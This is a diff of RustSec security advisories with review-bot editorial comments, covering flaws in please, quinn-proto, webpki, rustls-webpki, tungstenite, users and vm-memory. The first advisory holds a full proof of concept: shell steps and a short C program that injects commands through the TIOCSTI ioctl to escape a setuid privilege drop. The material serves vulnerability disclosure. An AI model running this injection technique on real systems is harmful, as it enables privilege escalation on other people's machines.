+cvss = "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+
+[versions]
+patched = []
+
+[affected]
+```
+
+# Vulnerable to privilege escalation using ioctls TIOCSTI and TIOCLINUX
+
+please is vulnerable to privilege escalation using ioctls TIOCSTI
+and TIOCLINUX on systems where they are not disabled.
+
+Here is how to see it in action:
+
+```
+$ cd "$(mktemp -d)"
+$ git clone --depth 1 https://gitlab.com/edneville/please.git
+$ cd please/
+$ git rev-parse HEAD  # f3598f8fae5455a8ecf22afca19eaba7be5053c9
+$ cargo test && cargo build --release
+$ echo 
"[${USER}_as_nobody]"$'\nname='"${USER}"$'\ntarget=nobody\nrule=.*\nrequire_pass=false'
 | sudo tee /etc/please.ini
+$ sudo chown root:root ./target/release/please
+$ sudo chmod u+s ./target/release/please
+$ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c
+#include <sys/ioctl.h>
+
+int main(void) {
+  const char *text = "id\n";
+  while (*text)
+    ioctl(0, TIOCSTI, text++);
+  return 0;
+}
+TIOCSTI_C_EOF
+$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
+$ ./target/release/please -u nobody /tmp/TIOCSTI  # runs id(1) as ${USER} 
rather than nobody
+```
+
+Please note that:
+
+This affects both the case where root wants to drop privileges as well when 
non-root wants to gain other privileges.
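Review bot: the `[affected]` table at the end of the TOML header is empty and `keywords = []` is empty too, which adds nothing to the advisory; either drop both lines or fill them in (the affected surface is the setuid `please` binary itself, not a single function, so an empty `[affected]` is misleading rather than informative). Two documentation points follow from the body text: "on systems where they are not disabled" tells an operator neither how to check whether `TIOCSTI`/`TIOCLINUX` are disabled on their kernel nor how to disable them, and the advisory should say so or link to it; and the reproduction only exercises the `${USER}` to `nobody` direction (the injected `id\n` is read by the caller's own shell once `please` exits, which is why the comment says it runs as `${USER}`), while the closing sentence asserts both directions are affected, so the second direction (non-root gaining another user's privileges) is claimed but not demonstrated. Finally, `patched = []` with no `unaffected` range is correct only if the issue is still open at the linked GitLab issue 13; worth confirming before this lands.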
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/quinn-proto/RUSTSEC-2023-0063.md 
new/advisory-db-20231007/crates/quinn-proto/RUSTSEC-2023-0063.md
--- old/advisory-db-20230818/crates/quinn-proto/RUSTSEC-2023-0063.md    
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/quinn-proto/RUSTSEC-2023-0063.md    
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,21 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0063"
+package = "quinn-proto"
+date = "2023-09-21"
+url = "https://github.com/quinn-rs/quinn/pull/1667";
+categories = ["denial-of-service"]
+keywords = ["panic"]
+aliases = ["GHSA-q8wc-j5m9-27w3"]
+cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+
+[versions]
+patched = ["^0.9.5", ">= 0.10.5"]
+```
+
+# Denial of service in Quinn servers
+
+Receiving QUIC frames containing a frame with unknown frame type could lead to 
a panic.
+Unfortunately this is issue was not found by our fuzzing infrastructure.
+
+Thanks to the QUIC Tester research group for reporting this issue.
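Review bot: grammar in the body, "Unfortunately this is issue was not found" should read "Unfortunately this issue was not found". The first sentence is also circular ("QUIC frames containing a frame with unknown frame type"); "Receiving a QUIC packet containing a frame with an unknown frame type could lead to a panic" states the trigger plainly. The `patched` list mixes requirement styles (`"^0.9.5"` alongside `">= 0.10.5"`); `^0.9.5` resolves to `>= 0.9.5, < 0.10.0` and is correct, but the other advisories in this patch spell such ranges out explicitly (compare `">= 0.100.2, < 0.101.0"` in RUSTSEC-2023-0053), so consider the same form here for consistency.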
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/rustdecimal/RUSTSEC-2022-0042.md 
new/advisory-db-20231007/crates/rustdecimal/RUSTSEC-2022-0042.md
--- old/advisory-db-20230818/crates/rustdecimal/RUSTSEC-2022-0042.md    
2023-08-14 19:14:25.000000000 +0200
+++ new/advisory-db-20231007/crates/rustdecimal/RUSTSEC-2022-0042.md    
2023-10-03 15:53:18.000000000 +0200
@@ -6,7 +6,7 @@
 url = 
"https://groups.google.com/g/rustlang-security-announcements/c/5DVtC8pgJLw?pli=1";
 categories = ["code-execution"]
 keywords = ["typosquatting"]
-aliases = ["GHSA-7pwq-f4pq-78gm"]
+aliases = ["GHSA-7pwq-f4pq-78gm", "MAL-2022-1"]
 [versions]
 patched = []
 ```
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/rustls-webpki/RUSTSEC-2023-0053.md 
new/advisory-db-20231007/crates/rustls-webpki/RUSTSEC-2023-0053.md
--- old/advisory-db-20230818/crates/rustls-webpki/RUSTSEC-2023-0053.md  
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/rustls-webpki/RUSTSEC-2023-0053.md  
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,31 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0053"
+package = "rustls-webpki"
+date = "2023-08-22"
+categories = ["denial-of-service"]
+keywords = ["certificate", "path building", "x509"]
+cvss = "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+related = ["CVE-2018-16875"]
+aliases = ["GHSA-fh2r-99q2-6mmg"]
+
+[versions]
+patched = [">= 0.100.2, < 0.101.0", ">= 0.101.4"]
+```
+
+# rustls-webpki: CPU denial of service in certificate path building
+
+When this crate is given a pathological certificate chain to validate, it will
+spend CPU time exponential with the number of candidate certificates at each
+step of path building.
+
+Both TLS clients and TLS servers that accept client certificate are affected.
+
+We now give each path building operation a budget of 100 signature 
verifications.
+
+The original `webpki` crate is also affected.
+
+This was previously reported in the original crate
+<https://github.com/briansmith/webpki/issues/69> and re-reported to us
+recently by Luke Malinowski.
+
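Review bot: "TLS servers that accept client certificate" should read "client certificates". The budget sentence ("We now give each path building operation a budget of 100 signature verifications") describes the fix in the first person from the maintainers' point of view and is the only line stating what the patched versions do; it would be clearer as "Patched versions give each path building operation a budget of 100 signature verifications". The `cvss` string uses `CVSS:3.0` while every other new advisory in this patch uses `CVSS:3.1`; if the vector was copied from the GHSA it may be intentional, otherwise align it. The file also ends with a trailing blank line after the last paragraph, unlike the other new files.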
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/tungstenite/RUSTSEC-2023-0065.md 
new/advisory-db-20231007/crates/tungstenite/RUSTSEC-2023-0065.md
--- old/advisory-db-20230818/crates/tungstenite/RUSTSEC-2023-0065.md    
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/tungstenite/RUSTSEC-2023-0065.md    
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,21 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0065"
+package = "tungstenite"
+date = "2023-09-25"
+url = "https://github.com/snapview/tungstenite-rs/issues/376";
+categories = ["denial-of-service"]
+aliases = ["CVE-2023-43669", "GHSA-9mcr-873m-xcxp"]
+cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+
+[versions]
+patched = [">= 0.20.1"]
+```
+
+# Tungstenite allows remote attackers to cause a denial of service
+
+The Tungstenite crate through 0.20.0 for Rust allows remote attackers to cause
+a denial of service (minutes of CPU consumption) via an excessive length of an
+HTTP header in a client handshake. The length affects both how many times a 
parse
+is attempted (e.g., thousands of times) and the average amount of data for each
+parse attempt (e.g., millions of bytes).
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/users/RUSTSEC-2023-0040.md 
new/advisory-db-20231007/crates/users/RUSTSEC-2023-0040.md
--- old/advisory-db-20230818/crates/users/RUSTSEC-2023-0040.md  2023-08-14 
19:14:25.000000000 +0200
+++ new/advisory-db-20231007/crates/users/RUSTSEC-2023-0040.md  2023-10-03 
15:53:18.000000000 +0200
@@ -15,7 +15,9 @@
 The `users` crate hasn't seen any action since 2020-10-08. The developer seems 
[MIA] since.
 
 ## Recommended alternatives
+- [`uzers`]
 - [`sysinfo`]
 
 [MIA]: https://github.com/ogham/rust-users/issues/54
+[`uzers`]: https://crates.io/crates/uzers
 [`sysinfo`]: https://crates.io/crates/sysinfo
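Review bot: the new `uzers` entry is bare, while the companion advisory RUSTSEC-2023-0059 for the same crate describes it as "an actively maintained fork of the `users` crate"; carrying that parenthetical here too tells a reader why it is listed first and is the better drop-in choice over `sysinfo`.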
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/users/RUSTSEC-2023-0059.md 
new/advisory-db-20231007/crates/users/RUSTSEC-2023-0059.md
--- old/advisory-db-20230818/crates/users/RUSTSEC-2023-0059.md  1970-01-01 
01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/users/RUSTSEC-2023-0059.md  2023-10-03 
15:53:18.000000000 +0200
@@ -0,0 +1,27 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0059"
+package = "users"
+date = "2023-09-10"
+url = "https://github.com/ogham/rust-users/issues/55";
+informational = "unsound"
+keywords = ["unaligned-read"]
+
+[versions]
+patched = []
+```
+
+# Unaligned read of `*const *const c_char` pointer
+
+Affected versions dereference a potentially unaligned pointer. The pointer is
+commonly unaligned in practice, resulting in undefined behavior.
+
+In some build modes, this is observable as a panic followed by abort. In other
+build modes the UB may manifest in some other way, including the possibility of
+working correctly in some architectures.
+
+The crate is not currently maintained, so a patched version is not available.
+
+## Recommended alternatives
+- [`uzers`](https://crates.io/crates/uzers) (an actively maintained fork of 
the `users` crate)
+- [`sysinfo`](https://crates.io/crates/sysinfo)
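Review bot: the advisory identifies neither the function nor the call site that dereferences the unaligned `*const *const c_char` pointer, and there is no `[affected.functions]` table (compare the vm-memory advisory in this same patch), so `cargo audit` cannot narrow the report and a reader cannot tell which `users` APIs to avoid; name the affected function(s), or say that all lookups are affected if that is the case. Wording: "working correctly in some architectures" should be "on some architectures", and "Affected versions" with `patched = []` means every version, which is worth stating outright.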
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/vm-memory/RUSTSEC-2023-0056.md 
new/advisory-db-20231007/crates/vm-memory/RUSTSEC-2023-0056.md
--- old/advisory-db-20230818/crates/vm-memory/RUSTSEC-2023-0056.md      
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/vm-memory/RUSTSEC-2023-0056.md      
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,29 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0056"
+package = "vm-memory"
+date = "2023-09-01"
+url = "https://github.com/rust-vmm/vm-memory/issues/250";
+references = 
["https://github.com/rust-vmm/vm-memory/commit/aff1dd4a5259f7deba56692840f7a2d9ca34c9c8";]
+informational = "unsound"
+categories = ["memory-exposure"]
+cvss = "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
+aliases = ["CVE-2023-41051", "GHSA-49hh-fprx-m68g"]
+
+[affected]
+[affected.functions]
+"vm_memory::volatile_memory::VolatileMemory::get_atomic_ref" = ["< 0.12.2"]
+"vm_memory::volatile_memory::VolatileMemory::aligned_as_ref" = ["< 0.12.2"]
+"vm_memory::volatile_memory::VolatileMemory::aligned_as_mut" = ["< 0.12.2"]
+"vm_memory::volatile_memory::VolatileMemory::get_ref" = ["< 0.12.2"]
+"vm_memory::volatile_memory::VolatileMemory::get_array_ref" = ["< 0.12.2"]
+
+[versions]
+patched = [">= 0.12.2"]
+```
+
+# Default functions in VolatileMemory trait lack bounds checks, potentially 
leading to out-of-bounds memory accesses 
+
+An issue was discovered in the default implementations of the 
`VolatileMemory::{get_atomic_ref, aligned_as_ref, aligned_as_mut, get_ref, 
get_array_ref}` trait functions, which allows out-of-bounds memory access if 
the `VolatileMemory::get_slice` function returns a `VolatileSlice` whose length 
is less than the function’s `count` argument. No implementations of 
`get_slice` provided in `vm_memory` are affected. Users of custom 
`VolatileMemory` implementations may be impacted if the custom implementation 
does not adhere to `get_slice`'s documentation.
+
+The issue started in version 0.1.0 but was fixed in version 0.12.2 by 
inserting a check that verifies that the `VolatileSlice` returned by 
`get_slice` is of the correct length.
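Review bot: the category and the CVSS vector disagree. `categories = ["memory-exposure"]` describes a confidentiality impact, but the vector `CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L` scores confidentiality and integrity as none and only availability as low, while the body describes an out-of-bounds memory access through `get_ref`/`get_array_ref`/`aligned_as_mut`, which is a memory-safety issue; pick one description and make the other agree (a `memory-corruption` category would match the body better than `memory-exposure`). The `[affected.functions]` table with `"< 0.12.2"` for each function is consistent with `patched = [">= 0.12.2"]`. Trailing whitespace after the title line should be removed.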
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/webpki/RUSTSEC-2023-0052.md 
new/advisory-db-20231007/crates/webpki/RUSTSEC-2023-0052.md
--- old/advisory-db-20230818/crates/webpki/RUSTSEC-2023-0052.md 1970-01-01 
01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/webpki/RUSTSEC-2023-0052.md 2023-10-03 
15:53:18.000000000 +0200
@@ -0,0 +1,28 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0052"
+package = "webpki"
+date = "2023-08-22"
+categories = ["denial-of-service"]
+keywords = ["certificate", "path building", "x509"]
+cvss = "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+related = ["CVE-2018-16875"]
+aliases = ["GHSA-8qv2-5vq6-g2g7"]
+
+[versions]
+patched = [">= 0.22.2"]
+```
+
+# webpki: CPU denial of service in certificate path building
+
+When this crate is given a pathological certificate chain to validate, it will
+spend CPU time exponential with the number of candidate certificates at each
+step of path building.
+
+Both TLS clients and TLS servers that accept client certificate are affected.
+
+This was previously reported in
+<https://github.com/briansmith/webpki/issues/69> and re-reported recently
+by Luke Malinowski.
+
+webpki 0.22.1 included a partial fix and webpki 0.22.2 added further fixes.
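Review bot: same wording fix as in the rustls-webpki advisory, "accept client certificate" should be "accept client certificates", and the same `CVSS:3.0` versus `CVSS:3.1` inconsistency with the rest of the patch. The last line says 0.22.1 "included a partial fix" while `patched = [">= 0.22.2"]`; that is the right call, but the body should say explicitly that 0.22.1 is still considered vulnerable so nobody reads the sentence as 0.22.1 being acceptable.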
